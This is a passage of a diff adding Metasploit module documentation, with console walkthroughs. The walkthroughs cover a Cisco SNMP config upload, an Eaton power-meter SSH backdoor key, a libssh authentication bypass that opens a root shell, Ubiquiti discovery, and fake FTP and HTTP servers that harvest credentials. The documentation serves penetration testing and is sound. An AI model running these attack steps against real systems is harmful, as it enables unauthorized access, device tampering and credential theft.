||||
### Cisco UC520-8U-4FXO-K9 running IOS 12.4
|
||||
|
||||
```
|
||||
msf5 > setg rhosts 2.2.2.2
|
||||
rhosts => 2.2.2.2
|
||||
msf5 > use auxiliary/scanner/snmp/cisco_upload_file
|
||||
msf5 auxiliary(scanner/snmp/cisco_upload_file) > set source /tmp/backup_config2
|
||||
source => /tmp/backup_config2
|
||||
msf5 auxiliary(scanner/snmp/cisco_upload_file) > set community private
|
||||
community => private
|
||||
msf5 auxiliary(scanner/snmp/cisco_upload_file) > run
|
||||
|
||||
[*] Starting TFTP server...
|
||||
[*] Copying file backup_config2 to 2.2.2.2...
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Providing some time for transfers to complete...
|
||||
[*] Shutting down the TFTP service...
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
|
@ -0,0 +1,39 @@
|
|||
# Description
|
||||
|
||||
The `eaton_xpert_backdoor` module scans for Eaton Xpert Power meters with a vendor SSH private key used in the device firmware's build process.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Eaton is a power management company with a wide range of power management products.
|
||||
Power meters sold by Eaton used a firmware build process for many years that left a developer key pair in the default profile.
|
||||
Specific models include: Power Xpert Meter 4000/6000/8000
|
||||
|
||||
[Software Link](http://www.eaton.com/Eaton/ProductsServices/Electrical/ProductsandServices/PowerQualityandMonitoring/PowerandEnergyMeters/PowerXpertMeter400060008000/index.htm#tabs-2)
|
||||
|
||||
Vulnerable Version: Firmware <= 12.x and <= 13.3.x.x and below more versions may be impacted
|
||||
|
||||
Tested on: Firmware 12.1.9.1 and 13.3.2.10
|
||||
|
||||
Similar to running: `ssh -m hmac-sha1 -c aes128-cbc -o KexAlgorithms=diffie-hellman-group1-sha1 -o HostKeyAlgorithms=ssh-rsa -i ./id_rsa admin@1.1.1.2`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. `use auxiliary/scanner/ssh/eaton_xpert_backdoor`
|
||||
3. `set RHOSTS 1.1.1.2`
|
||||
4. `run -z`
|
||||
5. Vulnerable hosts should present a shell
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/ssh/eaton_xpert_backdoor
|
||||
msf auxiliary(scanner/ssh/eaton_xpert_backdoor) > set RHOSTS 1.1.1.2
|
||||
RHOSTS => 1.1.1.2
|
||||
msf auxiliary(scanner/ssh/eaton_xpert_backdoor) > run -z
|
||||
|
||||
[+] 1.1.1.2:22 - Logged in as admin
|
||||
[*] Command shell session 1 opened (1.1.1.1:62063 -> 1.1.1.2:22) at 2018-08-31 19:12:21 -0400
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
|
@ -0,0 +1,167 @@
|
|||
## Intro
|
||||
|
||||
This module exploits an authentication bypass in libssh server code
|
||||
where a `USERAUTH_SUCCESS` message is sent in place of the expected
|
||||
`USERAUTH_REQUEST` message. libssh versions 0.6.0 through 0.7.5 and
|
||||
0.8.0 through 0.8.3 are vulnerable.
|
||||
|
||||
Note that this module's success depends on whether the server code
|
||||
can trigger the correct (`shell`/`exec`) callbacks despite only the state
|
||||
machine's authenticated state being set.
|
||||
|
||||
Therefore, you may or may not get a shell if the server requires
|
||||
additional code paths to be followed.
|
||||
|
||||
## Setup
|
||||
|
||||
1. `git clone git://git.libssh.org/projects/libssh.git`
|
||||
2. `cd libssh` and `git checkout libssh-0.8.3`
|
||||
3. `git apply -p1 /path/to/metasploit-framework/external/source/libssh/ssh_server_fork.patch`
|
||||
4. Follow the steps in `INSTALL` to build libssh
|
||||
5. Run `build/examples/ssh_server_fork` (I like to `strace` it)
|
||||
|
||||
## Actions
|
||||
|
||||
```
|
||||
Name Description
|
||||
---- -----------
|
||||
Execute Execute a command
|
||||
Shell Spawn a shell
|
||||
```
|
||||
|
||||
## Options
|
||||
|
||||
**CMD**
|
||||
|
||||
Set this to a command or shell you want to execute. An `exec` channel
|
||||
request will be sent instead of a `shell` channel request.
|
||||
|
||||
**SPAWN_PTY**
|
||||
|
||||
Enable this if you would like a PTY. Some server implementations may
|
||||
require this. Note that you WILL be logged in `utmp`, `wtmp`, and
|
||||
`lastlog` in most cases.
|
||||
|
||||
**CHECK_BANNER**
|
||||
|
||||
This is a banner check for libssh. It's not sophisticated, and the
|
||||
banner may be changed, but it may prevent false positives due to how the
|
||||
OOB authentication packet always returns `true`.
|
||||
|
||||
## Usage
|
||||
|
||||
Positive testing against unpatched libssh 0.8.3:
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/scanner/ssh/libssh_auth_bypass
|
||||
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rhosts 172.28.128.3
|
||||
rhosts => 172.28.128.3
|
||||
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 2222
|
||||
rport => 2222
|
||||
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set spawn_pty true
|
||||
spawn_pty => true
|
||||
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set verbose true
|
||||
verbose => true
|
||||
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
|
||||
|
||||
[*] 172.28.128.3:2222 - Attempting authentication bypass
|
||||
[+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched
|
||||
[*] Command shell session 1 opened (172.28.128.1:56981 -> 172.28.128.3:2222) at 2018-10-19 12:38:24 -0500
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > sessions -1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
# id
|
||||
id
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
# uname -a
|
||||
uname -a
|
||||
Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
|
||||
# tty
|
||||
tty
|
||||
/dev/pts/1
|
||||
#
|
||||
```
|
||||
|
||||
Positive testing of shell commands using the `Execute` action:
|
||||
|
||||
```
|
||||
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set action Execute
|
||||
action => Execute
|
||||
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set cmd id; uname -a
|
||||
cmd => id; uname -a
|
||||
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
|
||||
|
||||
[*] 172.28.128.3:2222 - Attempting authentication bypass
|
||||
[+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched
|
||||
[*] 172.28.128.3:2222 - Executed: id; uname -a
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) >
|
||||
```
|
||||
|
||||
Negative testing against patched libssh 0.8.4:
|
||||
|
||||
```
|
||||
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
|
||||
|
||||
[*] 172.28.128.3:2222 - Attempting authentication bypass
|
||||
[-] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.4 appears to be patched
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) >
|
||||
```
|
||||
|
||||
Negative testing against an insufficiently implemented libssh server:
|
||||
|
||||
```
|
||||
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
|
||||
|
||||
[*] 172.28.128.3:2222 - Attempting authentication bypass
|
||||
[+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched
|
||||
[-] 172.28.128.3:2222 - Net::SSH::ChannelOpenFailed: Session channel open failed (1)
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
|
||||
|
||||
[*] 172.28.128.3:2222 - Attempting authentication bypass
|
||||
[+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched
|
||||
[-] 172.28.128.3:2222 - Net::SSH::ChannelRequestFailed: Shell/exec channel request failed
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) >
|
||||
```
|
||||
|
||||
Negative testing against OpenSSH:
|
||||
|
||||
```
|
||||
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 22
|
||||
rport => 22
|
||||
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
|
||||
|
||||
[*] 172.28.128.3:22 - Attempting authentication bypass
|
||||
[-] 172.28.128.3:22 - SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4 does not appear to be libssh
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) >
|
||||
```
|
||||
|
||||
Confirming auth is still normally present using the OpenSSH client:
|
||||
|
||||
```
|
||||
wvu@kharak:~$ ssh -vp 2222 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null myuser@172.28.128.3
|
||||
[snip]
|
||||
debug1: Authentications that can continue: password
|
||||
debug1: Next authentication method: password
|
||||
myuser@172.28.128.3's password: wrongpassword
|
||||
debug1: Authentications that can continue: password
|
||||
Permission denied, please try again.
|
||||
myuser@172.28.128.3's password: mypassword
|
||||
debug1: Authentication succeeded (password).
|
||||
Authenticated to 172.28.128.3 ([172.28.128.3]:2222).
|
||||
[snip]
|
||||
#
|
||||
```
|
|
@ -0,0 +1,21 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Many devices produced by Ubiquiti are affected by this issue.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Locate a network known or suspected to house Ubiquiti devices
|
||||
2. Start msfconsole
|
||||
3. Do: `use auxiliary/scanner/ubiquiti_discovery`
|
||||
4. Do: `set RHOSTS <some_targets>`
|
||||
5. Do: `run`
|
||||
|
||||
## Scenarios
|
||||
|
||||
An example run against a Ubiquiti EdgeRouter-X:
|
||||
|
||||
|
||||
```
|
||||
msf5 auxiliary(scanner/ubiquiti/ubiquiti_discover) > run
|
||||
[+] 192.168.1.1:10001 Ubiquiti Discovery metadata: {"ips"=>["192.168.0.1", "192.168.1.1"], "macs"=>["80:2a:a8:df:aa:bb", "f8:1e:df:f8:aa:bb"], "name"=>"ubnt", "model_short"=>"ER-X", "firmware"=>"EdgeRouter.ER-e50.v1.9.7+hotfix.4.5024279.171006.0255"}
|
||||
```
|
|
@ -0,0 +1,170 @@
|
|||
This module creates a mock FTP server which accepts credentials before throwing a `500` error.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: ```use auxiliary/server/capture/ftp```
|
||||
3. Do: ```run```
|
||||
|
||||
## Options
|
||||
|
||||
**BANNER**
|
||||
|
||||
The Banner which should be displayed (200 server message). Default is `FTP Server Ready`.
|
||||
Some notable banners to emulate:
|
||||
|
||||
* `Microsoft FTP Service`
|
||||
* `ucftpd FTP server ready.`
|
||||
* `Serv-U FTP Server v6.4 for WinSock ready...`
|
||||
* `Serv-U FTP Server v15.0 ready...`
|
||||
* `ProFTPD 1.3.4a Server (FTP-Server)`
|
||||
|
||||
**SSL**
|
||||
|
||||
Boolean if SSL should be used, making this FTPS. FTPS is typically run on port 990. If `SSLCert` is not set, a certificate
|
||||
will be automatically generated. Default is `False`.
|
||||
|
||||
**SSLCert**
|
||||
|
||||
File path to a combined Private Key and Certificate file. If not provided, a certificate will be automatically
|
||||
generated. Default is ``.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### FTP Emulating Microsoft with Telnet Client
|
||||
|
||||
Server:
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/server/capture/ftp
|
||||
msf5 auxiliary(server/capture/ftp) > set banner "Microsoft FTP Service"
|
||||
banner => Microsoft FTP Service
|
||||
msf5 auxiliary(server/capture/ftp) > run
|
||||
[*] Auxiliary module running as background job 0.
|
||||
msf5 auxiliary(server/capture/ftp) >
|
||||
[*] Started service listener on 0.0.0.0:21
|
||||
[*] Server started.
|
||||
[+] FTP LOGIN 127.0.0.1:44526 root / SuperSecret9
|
||||
```
|
||||
|
||||
Client:
|
||||
|
||||
```
|
||||
root@kali:~# telnet 127.0.0.1 21
|
||||
Trying 127.0.0.1...
|
||||
Connected to 127.0.0.1.
|
||||
Escape character is '^]'.
|
||||
220 Microsoft FTP Service
|
||||
USER root
|
||||
331 User name okay, need password...
|
||||
PASS SuperSecret9
|
||||
500 Error
|
||||
```
|
||||
|
||||
### FTPS with Self-Signed Certificate and curl/lftp Client
|
||||
|
||||
Server:
|
||||
|
||||
```
|
||||
msf5 > openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
|
||||
[*] exec: openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
|
||||
|
||||
Generating a RSA private key
|
||||
.................................+++++
|
||||
........+++++
|
||||
writing new private key to 'key.pem'
|
||||
-----
|
||||
You are about to be asked to enter information that will be incorporated
|
||||
into your certificate request.
|
||||
What you are about to enter is what is called a Distinguished Name or a DN.
|
||||
There are quite a few fields but you can leave some blank
|
||||
For some fields there will be a default value,
|
||||
If you enter '.', the field will be left blank.
|
||||
-----
|
||||
Country Name (2 letter code) [AU]:
|
||||
State or Province Name (full name) [Some-State]:
|
||||
Locality Name (eg, city) []:
|
||||
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
|
||||
Organizational Unit Name (eg, section) []:
|
||||
Common Name (e.g. server FQDN or YOUR name) []:
|
||||
Email Address []:
|
||||
msf5 > cat key.pem certificate.pem > selfsigned.pem
|
||||
[*] exec: cat key.pem certificate.pem > selfsigned.pem
|
||||
|
||||
msf5 > cat /root/metasploit-framework/selfsigned.pem
|
||||
[*] exec: cat /root/metasploit-framework/selfsigned.pem
|
||||
|
||||
-----BEGIN PRIVATE KEY-----
|
||||
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDMboMCNpx4nk16
|
||||
vx/4gPn7yzMDHh/iTm27gIQKlktxNNKo+I53Cl4vpxLTN4NHxBn47hAlLUm3cADx
|
||||
j/S9P6f62/GfcKsSeuN7VZ+anRyrdcmsKKenykv3wlfRAR5z7txqiO6LPQpUwiJT
|
||||
7sgVo8TYRkIIziEXarihk0w1eMKUVlFVR92HFyLaBv0Y1ftCCrZufq6QgStzwjwh
|
||||
qKFaWXSE3IjYwbVJs03dF2jBVQCVXBj4BTydwYxJ9NrCnwX7BgeRzJWKV+U4akxU
|
||||
unt5t3/NXJbeTNcHrcvY2CQK4kDhu37xy99jUvOxYxw+8P2HHEgmQWfzHJAJKYCX
|
||||
wKsFlR53AgMBAAECggEAA0jfSADSoMmCWy+I9vgzjA0mw60PPBaggru842Ko0afU
|
||||
nqxntZfwDXn0vnoM3PFUrYA9uCszHQRqr3btqsDEFS7FghdQWFqrHwcwKk7N8B9T
|
||||
XzXEA9knQVLZEF2hPKGg3wFWO9x+NwBrhse2ZUqdVhBC7VtKgtLPJqF0PwOytKlq
|
||||
/pYniZdkLPrGHcQ13f50vr/dlkIGQ4YaKcAFTjCOxnK7q4of+sa75hFsXVwtnz9j
|
||||
nw2SEs+SHEfLUl8wPww3IvwCkqFaosagIey2NyTtHxR3lqHobaOmu1nqXkNu/oXk
|
||||
bt67M3D8VOrKu2aR9sMbirnpjSj+aBSaIjso6kSCaQKBgQD+VdrjMJu3Cr4LSoZL
|
||||
FV7cog0HBlp3KE910rtY+VHH6c7jo4ow5vVvfITt78/Ntrkj1jAamAV2xA9okMay
|
||||
7BlL3MVx/MKeQTwEWjTWIed/7Xc5D8o/PqMC8WkIc0Uur3BprwkGTL+wBqo9PHSO
|
||||
eGo3zcdpbRrL0616o/7+uWIL1QKBgQDNxQq6tBlCY9ckuoof9SmayCmcU4t4Wusx
|
||||
UJWBN32X8IGVGJRCxMlfwzLUlJwOTIWSkCj6Dw8/njsehda3KgqXbzfemIqD9K+j
|
||||
/EL/ktrgBmh8ajnjBJX/2O7PsmeF7gFuDjVWflcG6WpuKFapkTsbU4D6ITmLi4uH
|
||||
0Ot0CMDjGwKBgQCpQrv0XKIUs/p8CzHKgENsdBBVb33/NP2EvSTfdrVdZRXB21GZ
|
||||
b+tBMc5Jh0J1djhKSD4lRKzGOH7EqS0DYCsJmLhyPrPKnEFz6BCnvVKSiZfBiuef
|
||||
JXFZAQ5UiFovUqRuQQWxgpxDanwbWsN7GVofHzypxemCYrJeHwwRu5ArrQKBgDpz
|
||||
FjEip2osYhiUxFd/lGnbIba+JIfzi4tekJk74fke4DAx4yt0Kp+BGxc3f3ywT+Dq
|
||||
AjnFvVcc4z4wVmWBE7EgboZUXkRNZPb32TAvzuyD5Xox0m+iBdm/DVcCHlX03YMd
|
||||
lhkTmjTkaM8RtkxEbL2+Yoyqk2YIJYJW3gr/0YqxAoGAe95gaeyjz5IvA/Spfztt
|
||||
t8Sw0PSNKhw7Th4UwYW1g38Yh/oedHjI/cwV2oegoGRe15nQGQ3IYhyB7yTtsRJI
|
||||
lVcthX4E1hPRsB3DiuldwWSxJcFhlhm72p/nas/ZsIkE4mKWccj6hJFUlnGhQh+y
|
||||
dUubf5UfmaGETVVd8MbMNvQ=
|
||||
-----END PRIVATE KEY-----
|
||||
-----BEGIN CERTIFICATE-----
|
||||
MIIDazCCAlOgAwIBAgIUDSznPwoelB25d/7v7bk+mjkDb0kwDQYJKoZIhvcNAQEL
|
||||
BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
|
||||
GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0xODExMDUwMjAxMDVaFw0xOTEx
|
||||
MDUwMjAxMDVaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw
|
||||
HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB
|
||||
AQUAA4IBDwAwggEKAoIBAQDMboMCNpx4nk16vx/4gPn7yzMDHh/iTm27gIQKlktx
|
||||
NNKo+I53Cl4vpxLTN4NHxBn47hAlLUm3cADxj/S9P6f62/GfcKsSeuN7VZ+anRyr
|
||||
dcmsKKenykv3wlfRAR5z7txqiO6LPQpUwiJT7sgVo8TYRkIIziEXarihk0w1eMKU
|
||||
VlFVR92HFyLaBv0Y1ftCCrZufq6QgStzwjwhqKFaWXSE3IjYwbVJs03dF2jBVQCV
|
||||
XBj4BTydwYxJ9NrCnwX7BgeRzJWKV+U4akxUunt5t3/NXJbeTNcHrcvY2CQK4kDh
|
||||
u37xy99jUvOxYxw+8P2HHEgmQWfzHJAJKYCXwKsFlR53AgMBAAGjUzBRMB0GA1Ud
|
||||
DgQWBBQzY/telaztoKPEd1vfKqXQ1khMWTAfBgNVHSMEGDAWgBQzY/telaztoKPE
|
||||
d1vfKqXQ1khMWTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQAT
|
||||
ch32xF4s6X4YTg00zbhztiBGxjDDSp6ULk68E6GuxSDcB+wE/nL66urdZJTvlFZk
|
||||
M26to4odpNhCnYiKIJr4eGvk/8H83yHJn4yr1O2Xy0MJ3piGt4gJm6cA9/DdOzlE
|
||||
U3tE8X+lcbq4fiz8pkUOU219jiw63OCfB7N1iGMdqCkpLWbGYXH71SAWqzpPFMsA
|
||||
0oBDYjN1rMBSVA5sFteZNNkidHRE7OaXCAQ20htLZe0cO1rWMO44JKEKalwJW4YZ
|
||||
n9UgZH3Kq/ptE3Jw6gdj11XT1RSn5NgCutxeCEuPzUhwg3XmVL5fOASJbohQxdGb
|
||||
mVuIIRbrDW/sOgu2Viis
|
||||
-----END CERTIFICATE-----
|
||||
|
||||
msf5 > use auxiliary/server/capture/ftp
|
||||
msf5 auxiliary(server/capture/ftp) > set srvport 990
|
||||
srvport => 990
|
||||
msf5 auxiliary(server/capture/ftp) > set ssl true
|
||||
ssl => true
|
||||
msf5 auxiliary(server/capture/ftp) > set sslcert /root/metasploit-framework/selfsigned.pem
|
||||
sslcert => /root/metasploit-framework/selfsigned.pem
|
||||
msf5 auxiliary(server/capture/ftp) > run
|
||||
[*] Auxiliary module running as background job 0.
|
||||
msf5 auxiliary(server/capture/ftp) >
|
||||
[*] Started service listener on 0.0.0.0:990
|
||||
[*] Server started.
|
||||
[+] FTP LOGIN 127.0.0.1:33618 admin / password123
|
||||
[+] FTP LOGIN 127.0.0.1:33758 admin / password4321
|
||||
```
|
||||
|
||||
Clients:
|
||||
|
||||
```
|
||||
root@kali:~# curl -k --ftp-ssl --user admin:password123 ftps://127.0.0.1:990
|
||||
curl: (67) Access denied: 500
|
||||
root@kali:~# lftp ftps://admin:password4321@127.0.0.1:990 -e "set ssl:verify-certificate no; dir;"
|
||||
ls: Login failed: 500 Error
|
||||
```
|
|
@ -0,0 +1,271 @@
|
|||
This module creates a mock web server which, utilizing a HTTP 401 response, prompts the user to enter credentials for Basic Authentication.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: ```use auxiliary/server/capture/http_basic```
|
||||
3. Do: ```run```
|
||||
|
||||
## Options
|
||||
|
||||
**REALM**
|
||||
|
||||
The Realm for the Basic Authentication, which may be displayed in the input box to the user.
|
||||
Default is `Secure Site`.
|
||||
Some notable Realms to emulate:
|
||||
|
||||
* `level_15 or view_access`
|
||||
* `cPanel`
|
||||
* `HuaweiHomeGateway`
|
||||
* `Broadband Router`
|
||||
|
||||
**RedirectURL**
|
||||
|
||||
After the user enters a set of credentials, their browser will be redirected to this address. Default is ``.
|
||||
|
||||
**SSL**
|
||||
|
||||
Boolean if SSL should be used, making this HTTPS. HTTPS is typically run on port 443. If `SSLCert` is not set, a certificate
|
||||
will be automatically generated. Default is `False`.
|
||||
|
||||
**SSLCert**
|
||||
|
||||
File path to a combined Private Key and Certificate file. If not provided, a certificate will be automatically
|
||||
generated. Default is ``.
|
||||
|
||||
**URIPATH**
|
||||
|
||||
What URI should be utilized to prompt for the Basic Authentication. For instance, you may want this to run on `/cisco` if you use
|
||||
the `REALM` `level_15 or view_access`. Default is ``, which will randomly generate a URIPATH.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Cisco Emulator with wget Client
|
||||
|
||||
Server:
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/server/capture/http_basic
|
||||
msf5 auxiliary(server/capture/http_basic) > set REALM "level_15 or view_access"
|
||||
REALM => level_15 or view_access
|
||||
msf5 auxiliary(server/capture/http_basic) > set uripath '/cisco'
|
||||
uripath => /cisco
|
||||
msf5 auxiliary(server/capture/http_basic) > run
|
||||
[*] Auxiliary module running as background job 0.
|
||||
msf5 auxiliary(server/capture/http_basic) >
|
||||
[*] Using URL: http://0.0.0.0:80/cisco
|
||||
[*] Local IP: http://10.1.1.1:80/cisco
|
||||
[*] Server started.
|
||||
[*] Sending 401 to client 127.0.0.1
|
||||
[+] 127.0.0.1 - Credential collected: "cisco:cisco" => /cisco
|
||||
```
|
||||
|
||||
Client:
|
||||
|
||||
```
|
||||
root@kali:~# wget http://cisco:cisco@127.0.0.1:80/cisco
|
||||
--2018-11-05 19:44:29-- http://cisco:*password*@127.0.0.1/cisco
|
||||
Connecting to 127.0.0.1:80... connected.
|
||||
HTTP request sent, awaiting response... 401 Unauthorized
|
||||
Authentication selected: Basic realm="level_15 or view_access"
|
||||
Reusing existing connection to 127.0.0.1:80.
|
||||
HTTP request sent, awaiting response... 404 Not Found
|
||||
2018-11-05 19:44:29 ERROR 404: Not Found.
|
||||
```
|
||||
|
||||
### HTTPS with Self-Signed Certificate and curl Client
|
||||
|
||||
Server:
|
||||
|
||||
```
|
||||
msf5 > openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
|
||||
[*] exec: openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
|
||||
|
||||
Generating a RSA private key
|
||||
............+++++
|
||||
.+++++
|
||||
writing new private key to 'key.pem'
|
||||
-----
|
||||
You are about to be asked to enter information that will be incorporated
|
||||
into your certificate request.
|
||||
What you are about to enter is what is called a Distinguished Name or a DN.
|
||||
There are quite a few fields but you can leave some blank
|
||||
For some fields there will be a default value,
|
||||
If you enter '.', the field will be left blank.
|
||||
-----
|
||||
Country Name (2 letter code) [AU]:
|
||||
State or Province Name (full name) [Some-State]:
|
||||
Locality Name (eg, city) []:
|
||||
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
|
||||
Organizational Unit Name (eg, section) []:
|
||||
Common Name (e.g. server FQDN or YOUR name) []:
|
||||
Email Address []:
|
||||
msf5 > cat key.pem certificate.pem > selfsigned.pem
|
||||
[*] exec: cat key.pem certificate.pem > selfsigned.pem
|
||||
|
||||
msf5 > cat /root/metasploit-framework/selfsigned.pem
|
||||
[*] exec: cat /root/metasploit-framework/selfsigned.pem
|
||||
|
||||
-----BEGIN PRIVATE KEY-----
|
||||
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQCmniuSmx1h57hK
|
||||
XxBCfCOfsfJatMEtsrTHFCC0GDvIIHGot8oniVKes7yK0w8GSr0LeJgH23QMf/N0
|
||||
SZlF6BRc0GELAC7qPa9VJ8HPYYVbO/VaqXMy83y7YuSh6QlP/DksHt0W0rfvcM36
|
||||
ypHiZ3LIbaz8VuAUyIU5Qa6G+TNvwClhQnaX3TLN0kk31pAwwuSRNvSYvmUih4HA
|
||||
eN29IJyoiXH+GEjw7wBbm9dkbU1DI71zSZyO/Tfi/2SwDwaTKCucW7tUEd9ey6AU
|
||||
5hB6jGpc9N7rMYqV82mLogsXGaRDWh/tt9hghGWAX3MfD7EebQqYr4vQssoisU62
|
||||
ct4DtCrNAgMBAAECggEAJ8ZohnYLHJ0xjGeHPSffZTcYsPiniR45M7ElYXjLhKni
|
||||
GDHPy4Jnu8UShF2AH7Nlz8A5It8LpBRDbQZI1bxiaAnCsNqZWIfjPEPia3xPVolI
|
||||
uBztiENCCoXAKLq142dFyrePdexVxo46Td1f2Blz+E7eVdrzYWLBEvsQC96fndRx
|
||||
8j6KT17tIhGz+9+87dwVUXiiBZTzeWRf94jofek3XWADlu6QjAd3qW944ljYyB7p
|
||||
+cJGwod5xFUxRdAr12RN+VIuzyP6xUXkfBQImdT3E0nR8LWwb4FcjwrCtCNEEYqU
|
||||
/CEBx8rm0qt7mBLiIjTq5+clfKKbd1XOXmGn7+7A7QKBgQDdoJl7NBcpBtLMC1kY
|
||||
KK78kar+nWS5am9H/3o76+sRmQGOCjRg9TyQBmqGkxb7en/m/xZzmS0QxbLCbChj
|
||||
nOgFn9owQKQ4a2FPiNHQ1BQ7F44E+B4j+1auS7VnpbzhPgyOwmZcDoRn5h+FeNwW
|
||||
Xma/o+a78rp53eTzG9Hy8lFMwwKBgQDAdX8h8Us1d34a/GuFljUBe5iJNo1giqgq
|
||||
X8R2BCshvQWoT2wz3YX4FRBKMZKdfwLfbRxK1bzW7BinpgoNR6NV0lor75BgQiCJ
|
||||
nztUMCfDAkxwCgXZjR20OS106G/SRjRgLtYkdDhmfynyy2MSAKhmVaLxBa57VlXD
|
||||
ZE2G4jdxLwKBgQCu1oReGnDu77AaQhWOJoItQ+lmpdoRH/McFGJkpS+zmUYNvOUn
|
||||
XC/j2vvsoFswFqqSG8ild0CDC8OC93pBY0XzMfEZwdULoUKKUQBcwwIWv/VM3ERC
|
||||
1IPESnuYgbpo4t9bO+cuVlGD+ZoCXJ8bkmtyYaWjvc/4VeHJG7hb9WfHqwKBgAe5
|
||||
L17nVgNRRkhC9PWpb3sdwKNRAx9qsRDyQuoRhMGX2lBEz6zNKQEppzuy/ZVAcZcR
|
||||
w97k8O0XEG455ZFe3JknFeNJe9vBC5k6QKFCRXY382VToaR3W0fOO5rDcSlZE+UA
|
||||
PCu+Vj0WwVIzA0jHqfphWWaeub/NWSe8MLhG/76VAoGBALTnftXB/b45xkgNEIZ3
|
||||
7WOsfvGo23tlXSQdCNNOn6YKptqYX88jeihcKEvGoIBH+LfV/GfD2P1d227kHyBZ
|
||||
FoZ+2dUwVXO2UP5j3WlxBleOqk0rTbIri/Pj4oCajAR4pXDIviUD+bUFojyFaysj
|
||||
It3LYabipjgG3NjDxYBMyJnt
|
||||
-----END PRIVATE KEY-----
|
||||
-----BEGIN CERTIFICATE-----
|
||||
MIIDazCCAlOgAwIBAgIUXlRMetgIkrPIiamQGIBKbcEuT1IwDQYJKoZIhvcNAQEL
|
||||
BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
|
||||
GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0xODExMDYwMDQ2NDFaFw0xOTEx
|
||||
MDYwMDQ2NDFaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw
|
||||
HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB
|
||||
AQUAA4IBDwAwggEKAoIBAQCmniuSmx1h57hKXxBCfCOfsfJatMEtsrTHFCC0GDvI
|
||||
